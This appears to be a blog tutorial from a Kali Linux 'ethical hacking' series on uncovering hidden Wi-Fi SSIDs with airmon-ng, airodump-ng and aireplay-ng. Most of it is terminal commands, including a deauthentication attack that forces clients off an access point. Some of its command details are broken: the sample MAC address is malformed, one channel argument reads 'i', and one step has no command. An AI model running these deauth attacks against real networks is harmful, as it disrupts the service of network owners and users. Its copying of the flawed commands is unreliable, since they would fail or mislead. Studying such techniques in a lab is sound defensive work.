Ethical Hacking with Kali Linux [2] – Finding Hidden SSIDs

> > Welcome all, to this series of Kali Linux for Ethical Hacking. This is Second part, & we’ll be seeing some of the techniques of uncovering hidden SSIDs.

# Process :

– Enabling Wireless Monitoring : airmon-ng

– Discovering the APs (Access Points) : airodump-ng

– Stay calm for Association or use de-authentication : aireplay-ng

# . . . Let’s Begin,

– Before start, make sure that you have eth0, lo, wlan0 are in action. (go to terminal, & run ifconfig)

– Let’s start to monitor on that wireless interface, run :

airmon-ng start wlan0

– After executing above command, we must get new interface mon0 (monitor mode enabled)

– Verify that both interfaces are up & running, run


– Watch for wlan0 & mon0 , Run :

airodump-ng mon0

– For monitoring all the APs that Kali Linux OS can find out.

– From next step, note BSSID and ESSID, if there is any hidden SSID, then ESSID will be format like this : <length: 0> [Notice, it’s CH (Channel) and BSSID]

– CTRL+C (press)

airodump-ng -c 1 mon0
(here, 1 is channel we notice/you notice. Value may differ)

– After some time, you will notice <length: 0> changes and reveals SSID name.

# If it takes lot of time to reveal SSID, we can follow de-authenticate process, by cloning next terminal in kali linux.

– Copy BSSID (MAC) of ch 1

#Deauth Attack :

aireplay-ng -0 2 -a 00:A1:B2:11:20:13:5T mon0

– It sends de-auth to broadcast

airodump-ng -c i mon0


– Go over new Terminal

aireplay-ng -0 2 -a 00:A1:B2:11:20:13:5T mon0

– Finally you will get SSID in ESSID section.

“This series is only for educational purpose, practice this series lab in virtual/separate network, always avoid illegal activities, and if you can, then support us to fight against black hat hackers”

